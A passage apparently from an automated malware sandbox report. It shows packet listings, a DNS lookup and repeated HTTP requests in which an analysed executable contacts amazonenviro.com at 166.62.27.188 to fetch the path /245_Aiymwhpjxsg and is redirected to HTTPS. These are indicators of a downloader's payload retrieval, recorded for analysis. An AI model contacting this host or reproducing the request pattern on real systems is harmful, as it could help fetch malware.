                    Jan 14, 2025 08:25:32.556600094 CET50071443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:32.556610107 CET44350071166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:32.610291004 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:33.452900887 CET44350071166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:33.452995062 CET50071443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:33.454315901 CET50071443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:33.454338074 CET44350071166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:33.454544067 CET44350071166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:33.455749035 CET50071443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:33.499330997 CET44350071166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:34.060343027 CET44350071166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:34.060782909 CET44350071166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:34.060945034 CET50071443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:34.060945988 CET50071443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:34.064402103 CET50071443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:34.064415932 CET44350071166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:34.174527884 CET5007280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:34.179358959 CET8050072166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:34.179451942 CET5007280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:34.179554939 CET5007280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:34.181060076 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:34.184365034 CET8050072166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:34.184498072 CET8050072166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:34.184545040 CET5007280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:34.185811996 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:34.491100073 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:34.492485046 CET50073443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:34.492520094 CET44350073166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:34.492575884 CET50073443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:34.492933989 CET50073443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:34.492949963 CET44350073166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:34.544265032 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:35.378213882 CET44350073166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:35.378326893 CET50073443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:35.379662991 CET50073443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:35.379679918 CET44350073166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:35.379888058 CET44350073166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:35.381055117 CET50073443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:35.423329115 CET44350073166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:35.960453987 CET44350073166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:35.960736990 CET44350073166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:35.960803986 CET50073443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:35.960880041 CET50073443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:35.960899115 CET44350073166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:35.960916042 CET50073443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:35.960921049 CET44350073166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:36.072169065 CET5007480192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:36.077023029 CET8050074166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:36.077146053 CET5007480192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:36.077303886 CET5007480192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:36.078697920 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:36.082185984 CET8050074166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:36.082259893 CET5007480192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:36.083534002 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:36.389172077 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:36.390559912 CET50075443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:36.390600920 CET44350075166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:36.390700102 CET50075443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:36.391027927 CET50075443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:36.391043901 CET44350075166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:36.442250013 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:37.276078939 CET44350075166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:37.276138067 CET50075443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:37.277973890 CET50075443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:37.277986050 CET44350075166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:37.278182030 CET44350075166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:37.279536009 CET50075443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:37.327330112 CET44350075166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:37.855365038 CET44350075166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:37.855601072 CET44350075166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:37.855710030 CET50075443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:37.855834007 CET50075443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:37.855849981 CET44350075166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:37.855865002 CET50075443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:37.855870962 CET44350075166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:37.970657110 CET5007680192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:37.975519896 CET8050076166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:37.975591898 CET5007680192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:37.975778103 CET5007680192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:37.977544069 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:37.981132030 CET8050076166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:37.981223106 CET5007680192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:37.982815981 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:38.288398027 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:38.322460890 CET50077443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:38.322504997 CET44350077166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:38.322585106 CET50077443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:38.322947025 CET50077443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:38.322961092 CET44350077166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:38.329256058 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:39.232805014 CET44350077166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:39.232949972 CET50077443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:39.234261990 CET50077443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:39.234273911 CET44350077166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:39.235032082 CET44350077166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:39.236294031 CET50077443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:39.283330917 CET44350077166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:39.825571060 CET44350077166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:39.825757027 CET44350077166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:39.825834990 CET50077443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:39.825864077 CET50077443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:39.825864077 CET50077443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:39.825876951 CET44350077166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:39.825886965 CET44350077166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:39.939069986 CET5007880192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:39.943927050 CET8050078166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:39.944149017 CET5007880192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:39.944367886 CET5007880192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:39.946317911 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:39.949171066 CET8050078166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:39.949275017 CET5007880192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:39.951112032 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:40.257287025 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:40.259116888 CET50079443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:40.259161949 CET44350079166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:40.259253025 CET50079443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:40.259640932 CET50079443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:40.259655952 CET44350079166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:08.648893118 CET44350108166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:08.648968935 CET44350108166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:08.649032116 CET50108443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:08.649175882 CET50108443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:08.649192095 CET44350108166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:08.649203062 CET50108443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:08.649208069 CET44350108166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:08.761706114 CET5010980192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:08.766623020 CET8050109166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:08.766741991 CET5010980192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:08.766922951 CET5010980192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:08.768636942 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:08.771766901 CET8050109166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:08.771851063 CET5010980192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:08.773432016 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:09.078969955 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:09.080537081 CET50110443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:09.080581903 CET44350110166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:09.080671072 CET50110443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:09.080965042 CET50110443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:09.080976009 CET44350110166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:09.126279116 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:09.994039059 CET44350110166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:09.994141102 CET50110443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:09.995368958 CET50110443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:09.995374918 CET44350110166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:09.995615959 CET44350110166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:09.996701956 CET50110443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:10.043334961 CET44350110166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:10.585450888 CET44350110166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:10.585764885 CET44350110166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:10.585870028 CET50110443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:10.585980892 CET50110443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:10.585992098 CET44350110166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:10.586004019 CET50110443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:10.586009979 CET44350110166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:10.699958086 CET5011180192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:10.705002069 CET8050111166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:10.705111980 CET5011180192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:10.705202103 CET5011180192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:10.706983089 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:10.710163116 CET8050111166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:10.710223913 CET5011180192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:10.711827993 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:11.017462969 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:11.018816948 CET50112443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:11.018850088 CET44350112166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:11.018949032 CET50112443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:11.019354105 CET50112443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:11.019395113 CET44350112166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:11.059329987 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:11.902421951 CET44350112166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:11.902566910 CET50112443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:16.019196033 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:16.023020029 CET4971280192.168.2.6166.62.27.188
                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                    Jan 14, 2025 08:24:08.115179062 CET | 50629 | 53 | 192.168.2.6 | 1.1.1.1
                    Jan 14, 2025 08:24:08.149399042 CET | 53 | 50629 | 1.1.1.1 | 192.168.2.6
                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                    Jan 14, 2025 08:24:08.115179062 CET | 192.168.2.6 | 1.1.1.1 | 0x7ad1 | Standard query (0) | amazonenviro.com | A (IP address) | IN (0x0001) | false
                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                    Jan 14, 2025 08:24:08.149399042 CET | 1.1.1.1 | 192.168.2.6 | 0x7ad1 | No error (0) | amazonenviro.com |  | 166.62.27.188 | A (IP address) | IN (0x0001) | false
                    • amazonenviro.com
                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    0 | 192.168.2.6 | 49712 | 166.62.27.188 | 80 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jan 14, 2025 08:24:08.190970898 CET | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:24:09.177887917 CET | 500 | IN | HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:08 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:11.171236992 CET | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:24:11.481756926 CET | 500 | IN | HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:11 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:13.135656118 CET | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:24:13.446264982 CET | 500 | IN | HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:13 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:15.077289104 CET | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:24:15.387444973 CET | 500 | IN | HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:15 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:17.072043896 CET | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:24:17.383162975 CET | 500 | IN | HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:17 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:19.002906084 CET | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:24:19.313546896 CET | 500 | IN | HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:19 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:20.953970909 CET | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:24:21.264297009 CET | 500 | IN | HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:21 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:22.905419111 CET | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:24:23.215960026 CET | 500 | IN | HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:23 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:24.948091984 CET | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:24:25.259886026 CET | 500 | IN | HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:25 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:26.894489050 CET | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:24:27.204391003 CET | 500 | IN | HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:27 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:28.865905046 CET | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:24:29.176359892 CET | 500 | IN | HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:29 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:30.796313047 CET | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:24:31.106925011 CET | 500 | IN | HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:30 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:32.719608068 CET | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:24:33.138227940 CET | 500 | IN | HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:32 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:34.761452913 CET | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:24:35.071767092 CET | 500 | IN | HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:34 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:36.721414089 CET 165 OUT GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:24:37.031873941 CET 500 IN HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:36 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:38.674072027 CET 165 OUT GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:24:38.984817028 CET 500 IN HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:38 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
